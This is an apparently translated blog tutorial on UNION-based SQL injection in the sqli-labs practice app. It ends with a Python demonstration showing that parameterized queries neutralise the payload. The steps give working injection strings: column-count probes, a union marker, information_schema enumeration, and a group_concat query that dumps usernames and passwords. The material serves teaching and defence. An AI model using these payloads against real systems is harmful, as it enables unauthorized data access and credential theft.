Zhangxiaobai's road to penetration (7) -sql injection detailed operation steps -union joint query injection
2022-06-25 12:33:00 【Litbai_ zhang】
UNION joint query injection
Brief introduction to union
The union operator merges the result sets of two or more select statements.
Note: the select statements inside a union must have the same number of columns, and the corresponding columns must have compatible data types. The order of the columns in each select statement must also be the same.
By default, union returns only distinct values. To allow duplicate values, use union all.
Conditions for union injection
- Only the last select clause may contain order by
- Only the last select clause may contain limit
- As long as the select queries joined by union have the same number of fields and the column data types can be converted without error, the query returns results
- The injection point's page echoes the query result
Union injection process
Here we use sqli-labs to demonstrate the operation of union joint query injection.
1. Determine the number of columns with order by
order by sorts the result by a column; for example, order by 1 sorts the rows of the table by the first column in ascending order.
Append to the url input:
' order by 3--+
The ' closes the string literal, and --+ comments out the remainder of the line.
2. Find the display position
After repeating step 1 with different column numbers, we find that the table has three columns. Now look at what the page returns, pick the position where data is displayed, and proceed to the next injection.
Modify the url input to:
id=100' union select 1,2,3--+
Because the page only displays the first row of the result, the original query is deliberately given id=100, which matches no row, so that the row from the second select is displayed. This reveals the positions where data is echoed.
3. Read database information
We read database information by replacing the value at the display position found above.
Replace the 3 in the url statement with database() to read the name of the current database.
At the same position you can also list all database names with a subquery; replace the content with:
(select schema_name from information_schema.schemata limit 0,1)
limit restricts the output. Since the page can only display one row, we show the first row of data; to display the second row, change the 0 to 1, and step through the values in turn to obtain all database names. If you are not yet familiar with SQL, you can copy these statements and use them directly; this does not matter when you are just starting out.
4. Read table information
Similarly, replace the same position with a query for all tables of the current database:
select table_name from information_schema.tables where table_schema=database() limit 0,1
Adjust limit as in step 3 to enumerate all table names.
5. Read column information
Replace the same position with:
select column_name from information_schema.columns where table_name='users' limit 1,1
select column_name from information_schema.columns where table_name='users' limit 2,1
After replacement we obtain two key field names: username and password.
6. Query data
Likewise, replace the position with:
select group_concat(username,':',password) from users
The group_concat function is not explained in detail here; if you are interested, look up the concat family of functions.
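Steps 1 to 6 work only because the id parameter is spliced into the SQL text. The following is an added example, not code from the original post or from sqli-labs: it rebuilds a tiny stand-in for the lab's users table in SQLite (the rows are constructed), runs the page's order by probe and union marker through a vulnerable string-formatted query, and then runs the same payload through a parameterized query to show that the bound value is compared as an id and never reaches the parser. The --+ of the URLs is written as '-- ' because that is what the server receives after decoding.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the sqli-labs 'users' table. The rows are
    constructed sample data, not the lab's own."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'pw-one'), (2, 'bob', 'pw-two');
    """)
    return conn


def lookup_vulnerable(conn, user_id):
    """The pattern the post exploits: the id is formatted into the query text,
    so a quote ends the literal and '-- ' comments out the trailing LIMIT."""
    sql = "SELECT id, username, password FROM users WHERE id='%s' LIMIT 0,1" % user_id
    return conn.execute(sql).fetchone()  # like the lab page, render only the first row


def lookup_parameterized(conn, user_id):
    """Same query with a bound parameter. The driver passes the value
    separately from the statement, so quotes, UNION and comment markers
    inside it are just characters of an id that matches nothing."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchone()


def demo():
    """Run the page's probes against both lookups and collect what each returns."""
    conn = make_db()
    normal = "1"
    probe = "1' order by 3-- "              # step 1: sorts by column 3, query still valid
    probe_too_far = "1' order by 4-- "      # step 1: one column too many, query errors
    marker = "100' union select 1,2,3-- "   # step 2: id 100 matches nothing, marker row shows

    results = {
        "vuln_normal": lookup_vulnerable(conn, normal),
        "vuln_order_by_3": lookup_vulnerable(conn, probe),
        "vuln_union_marker": lookup_vulnerable(conn, marker),
        "param_normal": lookup_parameterized(conn, normal),
        "param_union_marker": lookup_parameterized(conn, marker),
    }
    try:
        lookup_vulnerable(conn, probe_too_far)
        results["vuln_order_by_4"] = "no error"
    except sqlite3.OperationalError as exc:
        # The differing behaviour for 3 vs 4 is the column-count oracle of step 1.
        results["vuln_order_by_4"] = "error: %s" % exc
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print("%-20s %r" % (name, value))
```

Against the vulnerable lookup the marker payload returns the row (1, 2, 3), the same echo the post uses to locate the display positions; against the parameterized lookup the identical string returns no row at all. Note that the fix is the placeholder, not input filtering: the value still contains the quote, the UNION and the comment, and none of it matters.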